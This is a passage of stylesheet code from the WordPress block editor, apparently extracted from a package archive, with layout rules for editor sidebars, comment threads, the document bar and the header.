auto;overflow:visible}.editor-resizable-editor__resize-handle{appearance:none;background:none;border:0;border-radius:9999px;bottom:0;cursor:ew-resize;height:100px;margin:auto 0;outline:none;padding:0;position:absolute;top:0;width:12px}.editor-resizable-editor__resize-handle:after{background-color:#75757566;border-radius:9999px;bottom:16px;content:"";left:0;position:absolute;right:4px;top:16px;width:4px}.editor-resizable-editor__resize-handle.is-left{right:-18px}.editor-resizable-editor__resize-handle.is-right{left:-18px}.editor-resizable-editor__resize-handle:active,.editor-resizable-editor__resize-handle:focus,.editor-resizable-editor__resize-handle:hover{opacity:1}.editor-resizable-editor__resize-handle:active:after,.editor-resizable-editor__resize-handle:focus:after,.editor-resizable-editor__resize-handle:hover:after{background-color:var(--wp-admin-theme-color)}.editor-layout__toggle-entities-saved-states-panel,.editor-layout__toggle-publish-panel,.editor-layout__toggle-sidebar-panel{background-color:#fff;border:1px dotted #ddd;bottom:auto;box-sizing:border-box;display:flex;height:auto!important;justify-content:center;left:0;padding:24px;position:fixed!important;right:auto;top:-9999em;width:280px;z-index:100000}.interface-interface-skeleton__actions:focus .editor-layout__toggle-entities-saved-states-panel,.interface-interface-skeleton__actions:focus .editor-layout__toggle-publish-panel,.interface-interface-skeleton__actions:focus-within .editor-layout__toggle-entities-saved-states-panel,.interface-interface-skeleton__actions:focus-within .editor-layout__toggle-publish-panel{bottom:0;top:auto}.editor-start-page-options__modal .editor-start-page-options__modal__actions{background-color:#fff;border-top:1px solid #ddd;bottom:0;height:72px;margin-left:-32px;margin-right:-32px;padding-left:32px;padding-right:32px;position:absolute;width:100%;z-index:1}.editor-start-page-options__modal .block-editor-block-patterns-list{padding-bottom:72px}.editor-start-page-options__modal-content .block-editor-block-patterns-list{column-count:2;column-gap:24px}@media (min-width:782px){.editor-start-page-options__modal-content .block-editor-block-patterns-list{column-count:3}}@media (min-width:1280px){.editor-start-page-options__modal-content .block-editor-block-patterns-list{column-count:4}}.editor-start-page-options__modal-content .block-editor-block-patterns-list .block-editor-block-patterns-list__list-item{break-inside:avoid-column;margin-bottom:24px}.editor-start-page-options__modal-content .block-editor-block-patterns-list .block-editor-block-patterns-list__list-item .block-editor-block-preview__container{min-height:100px}.editor-start-page-options__modal-content .block-editor-block-patterns-list .block-editor-block-patterns-list__list-item .block-editor-block-preview__content{width:100%}.editor-start-template-options__modal .editor-start-template-options__modal__actions{background-color:#fff;border-top:1px solid #ddd;bottom:0;height:92px;margin-left:-32px;margin-right:-32px;padding-left:32px;padding-right:32px;position:absolute;width:100%;z-index:1}.editor-start-template-options__modal .block-editor-block-patterns-list{padding-bottom:92px}.editor-start-template-options__modal-content .block-editor-block-patterns-list{column-count:2;column-gap:24px}@media (min-width:782px){.editor-start-template-options__modal-content .block-editor-block-patterns-list{column-count:3}}@media (min-width:1280px){.editor-start-template-options__modal-content .block-editor-block-patterns-list{column-count:4}}.editor-start-template-options__modal-content .block-editor-block-patterns-list .block-editor-block-patterns-list__list-item{break-inside:avoid-column}.editor-start-template-options__modal-content .block-editor-block-patterns-list .block-editor-block-patterns-list__list-item .block-editor-block-patterns-list__item-title{display:none}.components-panel__header.editor-sidebar__panel-tabs{padding-left:8px;padding-right:0}.components-panel__header.editor-sidebar__panel-tabs .components-button.has-icon{padding:0}@media (min-width:782px){.components-panel__header.editor-sidebar__panel-tabs .components-button.has-icon{display:flex}}.editor-post-summary .components-v-stack:empty{display:none}.editor-sidebar{box-sizing:border-box}.editor-sidebar *,.editor-sidebar :after,.editor-sidebar :before{box-sizing:inherit}.editor-site-discussion-dropdown__content .components-popover__content{min-width:320px;padding:16px}.table-of-contents__popover.components-popover .components-popover__content{min-width:380px}.components-popover.table-of-contents__popover{z-index:99998}.table-of-contents__popover .components-popover__content{padding:16px}@media (min-width:600px){.table-of-contents__popover .components-popover__content{max-height:calc(100vh - 120px);overflow-y:auto}}.table-of-contents__popover hr{margin:10px -16px 0}.table-of-contents__wrapper:focus:before{bottom:0;box-shadow:inset 0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color);content:"";display:block;left:0;pointer-events:none;position:absolute;right:0;top:0}.table-of-contents__counts{display:flex;flex-wrap:wrap;margin:-8px 0 0}.table-of-contents__count{color:#1e1e1e;display:flex;flex-basis:33%;flex-direction:column;font-size:13px;margin-bottom:0;margin-top:8px;padding-left:8px}.table-of-contents__count:nth-child(4n){padding-left:0}.table-of-contents__number,.table-of-contents__popover .word-count{color:#1e1e1e;font-size:21px;font-weight:400;line-height:30px}.table-of-contents__title{display:block;font-size:15px;font-weight:600;margin-top:20px}.editor-text-editor{box-sizing:border-box}.editor-text-editor *,.editor-text-editor :after,.editor-text-editor :before{box-sizing:inherit}.editor-text-editor{background-color:#fff;flex-grow:1;position:relative;width:100%}.editor-text-editor .editor-post-title.is-raw-text textarea,.editor-text-editor .editor-post-title:not(.is-raw-text){border:1px solid #949494;border-radius:0;font-family:Menlo,Consolas,monaco,monospace;font-size:2.5em;font-weight:400;line-height:1.4;max-width:none;padding:16px}@media (min-width:600px){.editor-text-editor .editor-post-title.is-raw-text textarea,.editor-text-editor .editor-post-title:not(.is-raw-text){padding:24px}}.editor-text-editor .editor-post-title.is-raw-text textarea:focus,.editor-text-editor .editor-post-title:not(.is-raw-text):focus{border-color:var(--wp-admin-theme-color);box-shadow:0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color)}.editor-text-editor__body{margin-left:auto;margin-right:auto;max-width:1080px;padding:0 12px 12px;width:100%}@media (min-width:960px){.editor-text-editor__body{padding:0 24px 24px}}.editor-text-editor__toolbar{background:#fffc;display:flex;left:0;padding:4px 12px;position:sticky;right:0;top:0;z-index:1}@media (min-width:600px){.editor-text-editor__toolbar{padding:12px}}@media (min-width:960px){.editor-text-editor__toolbar{padding:12px 24px}}.editor-text-editor__toolbar h2{color:#1e1e1e;font-size:13px;line-height:40px;margin:0 0 0 auto}.editor-visual-editor{background-color:var(--wp-editor-canvas-background);display:flex;position:relative}.editor-visual-editor iframe[name=editor-canvas]{background-color:initial}.editor-visual-editor{align-items:center}.editor-visual-editor.is-resizable{max-height:100%}.editor-visual-editor.has-padding{padding:24px 24px 0}.editor-visual-editor.is-iframed{overflow:hidden}.editor-visual-editor .components-button{font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-size:13px;padding:6px 12px}.editor-visual-editor .components-button.has-icon,.editor-visual-editor .components-button.is-tertiary{padding:6px}.editor-fields-content-preview{border-radius:4px;display:flex;flex-direction:column;height:100%}.dataviews-view-table .editor-fields-content-preview{flex-grow:0;width:96px}.editor-fields-content-preview .block-editor-block-preview__container,.editor-fields-content-preview .editor-fields-content-preview__empty{margin-bottom:auto;margin-top:auto}.editor-fields-content-preview__empty{text-align:center}PK!yy~~dist/editor/style.cssnuȯ@charset "UTF-8"; :root{ --wp-block-synced-color:#7a00df; --wp-block-synced-color--rgb:122, 0, 223; --wp-bound-block-color:var(--wp-block-synced-color); --wp-editor-canvas-background:#ddd; --wp-admin-theme-color:#007cba; --wp-admin-theme-color--rgb:0, 124, 186; --wp-admin-theme-color-darker-10:#006ba1; --wp-admin-theme-color-darker-10--rgb:0, 107, 160.5; --wp-admin-theme-color-darker-20:#005a87; --wp-admin-theme-color-darker-20--rgb:0, 90, 135; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ :root{ --wp-admin-border-width-focus:1.5px; } } .admin-ui-page{ background-color:#fff; color:#2f2f2f; container:admin-ui-page/inline-size; display:flex; flex-flow:column; height:100%; position:relative; z-index:1; } @media not (prefers-reduced-motion){ .admin-ui-page{ transition:width .2s ease-out; } } .admin-ui-page__header{ background:#fff; border-bottom:1px solid #f0f0f0; padding:16px 48px; position:sticky; top:0; } @container (max-width: 430px){ .admin-ui-page__header{ padding:16px 24px; } } .admin-ui-page__header-subtitle{ color:#757575; font-family:-apple-system,"system-ui",Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif; font-size:13px; font-weight:400; line-height:20px; margin:0; padding-block-end:8px; } .admin-ui-page__content{ display:flex; flex-direction:column; flex-grow:1; overflow:auto; } .admin-ui-page__content.has-padding{ padding:16px 20px; } @container (max-width: 430px){ .admin-ui-page__content.has-padding{ padding:16px 24px; } } .show-icon-labels .admin-ui-page__header-actions .components-button.has-icon{ padding:0 8px; width:auto; } .show-icon-labels .admin-ui-page__header-actions .components-button.has-icon svg{ display:none; } .show-icon-labels .admin-ui-page__header-actions .components-button.has-icon:after{ content:attr(aria-label); font-size:12px; } .interface-complementary-area-header{ background:#fff; gap:4px; padding-right:8px; } .interface-complementary-area-header .interface-complementary-area-header__title{ margin:0 auto 0 0; } .interface-complementary-area{ background:#fff; color:#1e1e1e; height:100%; overflow:auto; } @media (min-width:600px){ .interface-complementary-area{ -webkit-overflow-scrolling:touch; } } @media (min-width:782px){ .interface-complementary-area{ width:280px; } } .interface-complementary-area .components-panel{ border:none; position:relative; z-index:0; } .interface-complementary-area .components-panel__header{ position:sticky; top:0; z-index:1; } .interface-complementary-area .components-panel__header.editor-sidebar__panel-tabs{ top:0; } .interface-complementary-area p:not(.components-base-control__help,.components-form-token-field__help){ margin-top:0; } .interface-complementary-area h2{ color:#1e1e1e; font-size:13px; font-weight:500; margin-bottom:1.5em; } .interface-complementary-area h3{ color:#1e1e1e; font-size:11px; font-weight:500; margin-bottom:1.5em; text-transform:uppercase; } .interface-complementary-area hr{ border-bottom:1px solid #f0f0f0; border-top:none; margin:1.5em 0; } .interface-complementary-area div.components-toolbar,.interface-complementary-area div.components-toolbar-group{ box-shadow:none; margin-bottom:1.5em; } .interface-complementary-area div.components-toolbar-group:last-child,.interface-complementary-area div.components-toolbar:last-child{ margin-bottom:0; } .interface-complementary-area .block-editor-skip-to-selected-block:focus{ bottom:10px; left:auto; right:10px; top:auto; } .interface-complementary-area__fill{ height:100%; } @media (min-width:782px){ body.js.is-fullscreen-mode{ height:calc(100% + 32px); margin-top:-32px; } body.js.is-fullscreen-mode #adminmenumain,body.js.is-fullscreen-mode #wpadminbar{ display:none; } body.js.is-fullscreen-mode #wpcontent,body.js.is-fullscreen-mode #wpfooter{ margin-left:0; } } html.interface-interface-skeleton__html-container{ position:fixed; width:100%; } @media (min-width:782px){ html.interface-interface-skeleton__html-container:not(:has(.is-zoom-out)){ position:static; width:auto; } } .interface-interface-skeleton{ bottom:0; display:flex; flex-direction:row; height:auto; max-height:100%; position:fixed; right:0; top:46px; } @media (min-width:783px){ .interface-interface-skeleton{ top:32px; } .is-fullscreen-mode .interface-interface-skeleton{ top:0; } } .interface-interface-skeleton__editor{ display:flex; flex:0 1 100%; flex-direction:column; overflow:hidden; } .interface-interface-skeleton{ left:0; } @media (min-width:783px){ .interface-interface-skeleton{ left:160px; } } @media (min-width:783px){ .auto-fold .interface-interface-skeleton{ left:36px; } } @media (min-width:961px){ .auto-fold .interface-interface-skeleton{ left:160px; } } .folded .interface-interface-skeleton{ left:0; } @media (min-width:783px){ .folded .interface-interface-skeleton{ left:36px; } } body.is-fullscreen-mode .interface-interface-skeleton{ left:0 !important; } .interface-interface-skeleton__body{ display:flex; flex-grow:1; overflow:auto; overscroll-behavior-y:none; position:relative; } @media (min-width:782px){ .has-footer .interface-interface-skeleton__body{ padding-bottom:25px; } } .interface-interface-skeleton__content{ display:flex; flex-direction:column; flex-grow:1; overflow:auto; z-index:20; } @media (min-width:782px){ .interface-interface-skeleton__content{ z-index:auto; } } .interface-interface-skeleton__secondary-sidebar,.interface-interface-skeleton__sidebar{ background:#fff; bottom:0; color:#1e1e1e; flex-shrink:0; left:0; position:absolute; top:0; width:auto; z-index:100000; } @media (min-width:782px){ .interface-interface-skeleton__secondary-sidebar,.interface-interface-skeleton__sidebar{ position:relative !important; } } .interface-interface-skeleton__sidebar{ border-top:1px solid #e0e0e0; overflow:hidden; } @media (min-width:782px){ .interface-interface-skeleton__sidebar{ box-shadow:-1px 0 0 0 rgba(0,0,0,.133); outline:1px solid #0000; } } .interface-interface-skeleton__secondary-sidebar{ border-top:1px solid #e0e0e0; right:0; } @media (min-width:782px){ .interface-interface-skeleton__secondary-sidebar{ box-shadow:1px 0 0 0 rgba(0,0,0,.133); outline:1px solid #0000; } } .interface-interface-skeleton__header{ box-shadow:0 1px 0 0 rgba(0,0,0,.133); color:#1e1e1e; flex-shrink:0; height:auto; outline:1px solid #0000; z-index:30; } .interface-interface-skeleton__footer{ background-color:#fff; border-top:1px solid #e0e0e0; bottom:0; color:#1e1e1e; display:none; flex-shrink:0; height:auto; left:0; position:absolute; width:100%; z-index:90; } @media (min-width:782px){ .interface-interface-skeleton__footer{ display:flex; } } .interface-interface-skeleton__footer .block-editor-block-breadcrumb{ align-items:center; background:#fff; display:flex; font-size:13px; height:24px; padding:0 18px; z-index:30; } .interface-interface-skeleton__actions{ background:#fff; bottom:auto; color:#1e1e1e; left:auto; position:fixed !important; right:0; top:-9999em; width:100vw; z-index:100000; } @media (min-width:782px){ .interface-interface-skeleton__actions{ width:280px; } } .interface-interface-skeleton__actions:focus,.interface-interface-skeleton__actions:focus-within{ bottom:0; top:auto; } .is-entity-save-view-open .interface-interface-skeleton__actions:focus,.is-entity-save-view-open .interface-interface-skeleton__actions:focus-within{ top:46px; } @media (min-width:782px){ .is-entity-save-view-open .interface-interface-skeleton__actions:focus,.is-entity-save-view-open .interface-interface-skeleton__actions:focus-within{ border-left:1px solid #ddd; top:32px; } .is-fullscreen-mode .is-entity-save-view-open .interface-interface-skeleton__actions:focus,.is-fullscreen-mode .is-entity-save-view-open .interface-interface-skeleton__actions:focus-within{ top:0; } } .interface-pinned-items{ display:flex; } .interface-pinned-items .components-button{ display:none; margin:0; } .interface-pinned-items .components-button[aria-controls="edit-post:block"],.interface-pinned-items .components-button[aria-controls="edit-post:document"],.interface-pinned-items .components-button[aria-controls="edit-site:block-inspector"],.interface-pinned-items .components-button[aria-controls="edit-site:template"]{ display:flex; } .interface-pinned-items .components-button svg{ max-height:24px; max-width:24px; } @media (min-width:600px){ .interface-pinned-items .components-button{ display:flex; } } .interface-pinned-items{ gap:8px; } .editor-autocompleters__user .editor-autocompleters__no-avatar:before{ content:"\f110"; font:normal 20px/1 dashicons; margin-right:5px; vertical-align:middle; } .editor-autocompleters__user .editor-autocompleters__user-avatar{ flex-grow:0; flex-shrink:0; height:24px; margin-right:8px; max-width:none; width:24px; } .editor-autocompleters__user .editor-autocompleters__user-name{ flex-grow:1; flex-shrink:0; max-width:200px; overflow:hidden; text-overflow:ellipsis; white-space:nowrap; } .editor-autocompleters__user .editor-autocompleters__user-slug{ flex-grow:0; flex-shrink:0; margin-left:8px; max-width:100px; overflow:none; text-overflow:ellipsis; white-space:nowrap; } .editor-autocompleters__user:not(.is-primary) .editor-autocompleters__user-slug{ color:#757575; } .interface-interface-skeleton__sidebar:has(.editor-collab-sidebar){ box-shadow:none; } .interface-interface-skeleton__sidebar:has(.editor-collab-sidebar) .interface-complementary-area-header{ display:none; } .editor-collab-sidebar,.editor-collab-sidebar-panel{ height:100%; overflow:hidden; } .editor-collab-sidebar-panel{ padding:16px 16px 24px; } .editor-collab-sidebar-panel__thread{ background-color:#f0f0f0; border:1px solid #ddd; border-radius:8px; overflow:hidden; padding:16px; position:relative; width:auto; } .editor-collab-sidebar-panel__thread.is-selected{ background-color:#fff; box-shadow:0 2px 3px #0000000d,0 4px 5px #0000000a,0 12px 12px #00000008,0 16px 16px #00000005; z-index:1; } .editor-collab-sidebar-panel__thread:focus{ outline:var(--wp-admin-border-width-focus) solid var(--wp-admin-theme-color); outline-offset:calc(var(--wp-admin-border-width-focus)*-1); } .editor-collab-sidebar-panel__thread.is-floating{ left:16px; margin-top:16px; position:absolute; right:16px; } .editor-collab-sidebar-panel__user-name{ text-transform:capitalize; } .editor-collab-sidebar-panel__user-name,.editor-collab-sidebar-panel__user-time{ color:#757575; font-size:12px; font-weight:400; line-height:16px; text-align:left; } .editor-collab-sidebar-panel__user-comment p:last-child{ margin-bottom:0; } .editor-collab-sidebar-panel__user-avatar{ background:#fff; border-radius:50%; border-style:solid; border-width:var(--wp-admin-border-width-focus); flex-shrink:0; padding:var(--wp-admin-border-width-focus); } .editor-collab-sidebar-panel__comment-status{ margin-left:auto; } .editor-collab-sidebar-panel__comment-status button.has-icon:not(.has-text){ flex-shrink:0; height:24px; min-width:24px; padding:0; width:24px; } .editor-collab-sidebar-panel__comment-dropdown-menu{ flex-shrink:0; } .editor-collab-sidebar-panel__more-reply-separator:after,.editor-collab-sidebar-panel__more-reply-separator:before{ background-color:#ddd; content:""; display:block; flex:1; height:1px; width:100%; } .editor-collab-sidebar-panel__more-reply-button{ font-weight:500; } .editor-collab-sidebar-panel__resolution-text{ font-style:italic; } .editor-collab-sidebar-panel__comment-form textarea{ border:1px solid #949494; border-radius:2px; box-shadow:0 0 0 #0000; font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif; font-size:16px; line-height:normal; padding:6px 8px; } @media not (prefers-reduced-motion){ .editor-collab-sidebar-panel__comment-form textarea{ transition:box-shadow .1s linear; } } @media (min-width:600px){ .editor-collab-sidebar-panel__comment-form textarea{ font-size:13px; line-height:normal; } } .editor-collab-sidebar-panel__comment-form textarea:focus{ border-color:var(--wp-admin-theme-color); box-shadow:0 0 0 .5px var(--wp-admin-theme-color); outline:2px solid #0000; } .editor-collab-sidebar-panel__comment-form textarea::-webkit-input-placeholder{ color:#1e1e1e9e; } .editor-collab-sidebar-panel__comment-form textarea::-moz-placeholder{ color:#1e1e1e9e; } .editor-collab-sidebar-panel__comment-form textarea:-ms-input-placeholder{ color:#1e1e1e9e; } .editor-collab-sidebar-panel__comment-form textarea{ display:block; line-height:20px !important; padding:9px 11px; } .editor-collab-sidebar-panel__skip-to-block,.editor-collab-sidebar-panel__skip-to-comment{ background:#fff !important; clip-path:inset(50%); overflow:hidden; position:absolute; right:-9999px; top:-9999px; z-index:-1; } .editor-collab-sidebar-panel__skip-to-block:focus,.editor-collab-sidebar-panel__skip-to-comment:focus{ clip-path:none; overflow:visible; right:8px; z-index:1; } .editor-collab-sidebar-panel__skip-to-comment:focus{ top:8px; } .editor-collab-sidebar-panel__skip-to-block:focus{ bottom:8px; top:auto; } .comment-avatar{ background:#fff; border-radius:50%; border-style:solid; border-width:var(--wp-admin-border-width-focus); box-sizing:border-box; margin-left:-12px; padding:var(--wp-admin-border-width-focus); width:24px; } .comment-avatar:first-child{ margin-left:0; } .show-icon-labels .comment-avatar-indicator{ width:auto; } .show-icon-labels .comment-avatar-indicator div{ display:none; } .show-icon-labels .comment-avatar-indicator:after{ content:attr(aria-label); font-size:12px; } .editor-collapsible-block-toolbar{ align-items:center; display:flex; height:64px; overflow:hidden; } .editor-collapsible-block-toolbar .block-editor-block-contextual-toolbar{ background:#0000; border-bottom:0; height:100%; } .editor-collapsible-block-toolbar .block-editor-block-toolbar{ height:100%; padding-top:17px; } .editor-collapsible-block-toolbar .block-editor-block-toolbar .components-button:not(.block-editor-block-mover-button){ height:32px; } .editor-collapsible-block-toolbar:after{ background-color:#ddd; content:""; height:24px; margin-right:7px; width:1px; } .editor-collapsible-block-toolbar .components-toolbar,.editor-collapsible-block-toolbar .components-toolbar-group{ border-right:none; position:relative; } .editor-collapsible-block-toolbar .components-toolbar-group:after,.editor-collapsible-block-toolbar .components-toolbar:after{ background-color:#ddd; content:""; height:24px; position:absolute; right:-1px; top:4px; width:1px; } .editor-collapsible-block-toolbar .components-toolbar .components-toolbar-group.components-toolbar-group:after,.editor-collapsible-block-toolbar .components-toolbar-group .components-toolbar-group.components-toolbar-group:after{ display:none; } .editor-collapsible-block-toolbar .block-editor-block-mover.is-horizontal .block-editor-block-mover-button{ height:32px; overflow:visible; } @media (min-width:600px){ .editor-collapsible-block-toolbar .block-editor-block-mover:not(.is-horizontal) .block-editor-block-mover__move-button-container{ height:40px; position:relative; top:-4px; } } .editor-collapsible-block-toolbar.is-collapsed{ display:none; } .editor-content-only-settings-menu__description{ min-width:235px; padding:8px; } .editor-block-visibility__disabled-blocks-count{ background-color:#fff; border:1px solid #ddd; border-width:1px 0; box-shadow:-32px 0 0 0 #fff,32px 0 0 0 #fff; padding:8px; position:sticky; text-align:center; top:-5px; z-index:2; } .editor-block-visibility__disabled-blocks-count~.block-editor-block-manager__content .block-editor-block-manager__category-title{ top:31px; } .editor-block-visibility__disabled-blocks-count .is-link{ margin-left:12px; } .editor-blog-title-dropdown__content .components-popover__content{ min-width:320px; padding:16px; } .editor-document-bar{ align-items:center; background:#f0f0f0; border-radius:4px; display:flex; height:32px; justify-content:space-between; min-width:0; width:min(100%, 450px); } .editor-document-bar:hover{ background-color:#e0e0e0; } .editor-document-bar .components-button{ border-radius:4px; } @media not (prefers-reduced-motion){ .editor-document-bar .components-button{ transition:all .1s ease-out; } } .editor-document-bar .components-button:hover{ background:#e0e0e0; } @media screen and (min-width:782px) and (max-width:960px){ .editor-document-bar.has-back-button .editor-document-bar__post-type-label{ display:none; } } .editor-document-bar__command{ color:var(--wp-block-synced-color); flex-grow:1; overflow:hidden; } .editor-document-bar__title{ color:#1e1e1e; margin:0 auto; max-width:70%; overflow:hidden; } @media (min-width:782px){ .editor-document-bar__title{ padding-left:24px; } } .editor-document-bar__title h1{ align-items:center; display:flex; font-weight:400; justify-content:center; overflow:hidden; white-space:nowrap; } .editor-document-bar__post-title{ color:currentColor; flex:1; overflow:hidden; text-overflow:ellipsis; } .editor-document-bar__post-type-label{ color:#2f2f2f; flex:0; padding-left:4px; } @media screen and (max-width:600px){ .editor-document-bar__post-type-label{ display:none; } } .editor-document-bar__shortcut{ color:#2f2f2f; display:none; min-width:24px; } @media (min-width:782px){ .editor-document-bar__shortcut{ display:initial; } } .editor-document-bar__back.components-button.has-icon.has-text{ color:#757575; flex-shrink:0; gap:0; min-width:36px; position:absolute; z-index:1; } .editor-document-bar__back.components-button.has-icon.has-text:hover{ background-color:initial; color:#1e1e1e; } .editor-document-bar__icon-layout.editor-document-bar__icon-layout{ display:none; margin-left:12px; pointer-events:none; position:absolute; } .editor-document-bar__icon-layout.editor-document-bar__icon-layout svg{ fill:#949494; } @media (min-width:600px){ .editor-document-bar__icon-layout.editor-document-bar__icon-layout{ display:flex; } } .document-outline{ margin:20px 0; } .document-outline ul{ margin:0; padding:0; } .document-outline__item{ display:flex; margin:4px 0; } .document-outline__item a{ text-decoration:none; } .document-outline__item .document-outline__emdash:before{ color:#ddd; margin-right:4px; } .document-outline__item.is-h2 .document-outline__emdash:before{ content:"—"; } .document-outline__item.is-h3 .document-outline__emdash:before{ content:"——"; } .document-outline__item.is-h4 .document-outline__emdash:before{ content:"———"; } .document-outline__item.is-h5 .document-outline__emdash:before{ content:"————"; } .document-outline__item.is-h6 .document-outline__emdash:before{ content:"—————"; } .document-outline__button{ align-items:flex-start; background:none; border:none; border-radius:2px; color:#1e1e1e; cursor:pointer; display:flex; margin:0 0 0 -1px; padding:2px 5px 2px 1px; text-align:left; } .document-outline__button:disabled,.document-outline__button[aria-disabled=true]{ color:#757575; cursor:default; } .document-outline__button:focus{ box-shadow:0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color); outline:2px solid #0000; } .document-outline__level{ background:#ddd; border-radius:3px; color:#1e1e1e; font-size:13px; margin-right:4px; padding:1px 6px; } .is-invalid .document-outline__level{ background:#f0b849; } .document-outline__item-content{ padding:1px 0; } .editor-document-outline.has-no-headings>svg{ margin-top:28px; } .editor-document-outline.has-no-headings>p{ padding-left:32px; padding-right:32px; } .editor-document-outline.has-no-headings{ color:#757575; text-align:center; } .editor-document-tools{ align-items:center; display:inline-flex; } .editor-document-tools .editor-document-tools__left>.editor-history__redo,.editor-document-tools .editor-document-tools__left>.editor-history__undo{ display:none; } @media (min-width:782px){ .editor-document-tools .editor-document-tools__left>.editor-history__redo,.editor-document-tools .editor-document-tools__left>.editor-history__undo{ display:inline-flex; } } .editor-document-tools .editor-document-tools__left>.editor-document-tools__inserter-toggle{ display:inline-flex; } @media not (prefers-reduced-motion){ .editor-document-tools .editor-document-tools__left>.editor-document-tools__inserter-toggle svg{ transition:transform .2s cubic-bezier(.165, .84, .44, 1); } } .editor-document-tools .editor-document-tools__left>.editor-document-tools__inserter-toggle.is-pressed svg{ transform:rotate(45deg); } .editor-document-tools .block-editor-list-view{ display:none; } @media (min-width:600px){ .editor-document-tools .block-editor-list-view{ display:flex; } } .editor-document-tools .editor-document-tools__left>.components-button.has-icon,.editor-document-tools .editor-document-tools__left>.components-dropdown>.components-button.has-icon{ height:32px; min-width:32px; padding:4px; } .editor-document-tools .editor-document-tools__left>.components-button.has-icon.is-pressed,.editor-document-tools .editor-document-tools__left>.components-dropdown>.components-button.has-icon.is-pressed{ background:#1e1e1e; } .editor-document-tools .editor-document-tools__left>.components-button.has-icon:focus:not(:disabled),.editor-document-tools .editor-document-tools__left>.components-dropdown>.components-button.has-icon:focus:not(:disabled){ box-shadow:0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color), inset 0 0 0 1px #fff; outline:1px solid #0000; } .editor-document-tools .editor-document-tools__left>.components-button.has-icon:before,.editor-document-tools .editor-document-tools__left>.components-dropdown>.components-button.has-icon:before{ display:none; } .editor-document-tools__left{ align-items:center; display:inline-flex; gap:8px; } .editor-document-tools__left:not(:last-child){ margin-inline-end:8px; } .show-icon-labels .editor-document-tools .editor-document-tools__left>.editor-document-tools__inserter-toggle.has-icon{ padding:0 8px; width:auto; } .show-icon-labels .editor-document-tools__left>*+*{ margin-left:8px; } .editor-editor-interface .entities-saved-states__panel-header{ height:65px; } .editor-editor-interface .interface-interface-skeleton__content{ isolation:isolate; } .editor-visual-editor{ flex:1 0 auto; } .components-editor-notices__dismissible,.components-editor-notices__pinned{ color:#1e1e1e; left:0; position:relative; right:0; top:0; } .components-editor-notices__dismissible .components-notice,.components-editor-notices__pinned .components-notice{ border-bottom:1px solid #0003; box-sizing:border-box; min-height:64px; padding:0 12px; } .components-editor-notices__dismissible .components-notice .components-notice__dismiss,.components-editor-notices__pinned .components-notice .components-notice__dismiss{ margin-top:12px; } .entities-saved-states__panel-header{ background:#fff; border-bottom:1px solid #ddd; box-sizing:border-box; height:64px; padding-left:16px; padding-right:16px; } .entities-saved-states__text-prompt{ padding:16px 16px 4px; } .entities-saved-states__text-prompt .entities-saved-states__text-prompt--header{ display:block; margin-bottom:12px; } .entities-saved-states__panel.is-inline .entities-saved-states__text-prompt{ padding:0; } .entities-saved-states__panel.is-inline .entities-saved-states__panel-body{ border:0; padding-left:0; padding-right:0; } .entities-saved-states__panel.is-inline .entities-saved-states__panel-body>h2{ margin-bottom:0; margin-left:-16px; margin-right:-16px; } .entities-saved-states__panel.is-inline .entities-saved-states__panel-body>h2 button{ font-size:11px; text-transform:uppercase; } .entities-saved-states__panel.is-inline .entities-saved-states__text-prompt--header-wrapper{ display:none; } .entities-saved-states__panel.is-inline .entities-saved-states__text-prompt--changes-count{ margin-bottom:8px; margin-top:0; } .entities-saved-states__panel.is-inline .entities-saved-states__panel-footer{ margin-top:16px; } .entities-saved-states__change-control{ flex:1; } .entities-saved-states__changes{ font-size:13px; list-style:disc; margin:4px 16px 0 24px; } .entities-saved-states__changes li{ margin-bottom:4px; } .editor-error-boundary{ background-color:#fff; border:1px solid #1e1e1e; border-radius:2px; box-shadow:0 5px 15px #00000014,0 15px 27px #00000012,0 30px 36px #0000000a,0 50px 43px #00000005; font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif; margin:64px auto auto; max-width:780px; padding:1em; } .editor-header{ box-sizing:border-box; } .editor-header *,.editor-header :after,.editor-header :before{ box-sizing:inherit; } .editor-header{ background:#fff; display:grid; grid-auto-flow:row; grid-template:auto/64px minmax(0, max-content) minmax(min-content, 1fr) 64px; height:64px; } .editor-header:has(>.editor-header__center){ grid-template:auto/64px min-content 1fr min-content 64px; } @media (min-width:782px){ .editor-header:has(>.editor-header__center){ grid-template:auto/64px minmax(min-content, 2fr) 2.5fr minmax(min-content, 2fr) 64px; } } @media (min-width:480px){ .editor-header{ gap:16px; } } .editor-header{ align-items:center; justify-content:space-between; max-width:100vw; } @media (min-width:280px){ .editor-header{ flex-wrap:nowrap; } } .editor-header__toolbar{ grid-column:1 / 3; } .editor-header__toolbar>:first-child{ margin-inline:16px 0; } .editor-header__back-button+.editor-header__toolbar{ grid-column:2 / 3; } @media (min-width:480px){ .editor-header__back-button+.editor-header__toolbar>:first-child{ margin-inline:0; } } .editor-header__toolbar{ align-items:center; clip-path:inset(-2px); display:flex; min-width:0; } @media (min-width:480px){ .editor-header__toolbar{ clip-path:none; } } .editor-header__toolbar .table-of-contents{ display:none; } @media (min-width:600px){ .editor-header__toolbar .table-of-contents{ display:block; } } .editor-header__toolbar .editor-collapsible-block-toolbar,.editor-header__toolbar .editor-collapsible-block-toolbar.is-collapsed~.editor-collapsible-block-toolbar__toggle{ margin-inline:8px 0; } .editor-header__center{ align-items:center; clip-path:inset(-2px); display:flex; grid-column:3 / 4; justify-content:center; min-width:0; } @media (max-width:479px){ .editor-header__center>:first-child{ margin-inline-start:8px; } .editor-header__center>:last-child{ margin-inline-end:8px; } } .editor-header__settings{ grid-column:3 / -1; } .editor-header:has(>.editor-header__center) .editor-header__settings{ grid-column:4 / -1; } .editor-header__settings{ align-items:center; display:inline-flex; flex-wrap:nowrap; justify-self:end; padding-right:4px; } @media (min-width:600px){ .editor-header__settings{ padding-right:8px; } } .editor-header__settings{ gap:8px; } .show-icon-labels .editor-header 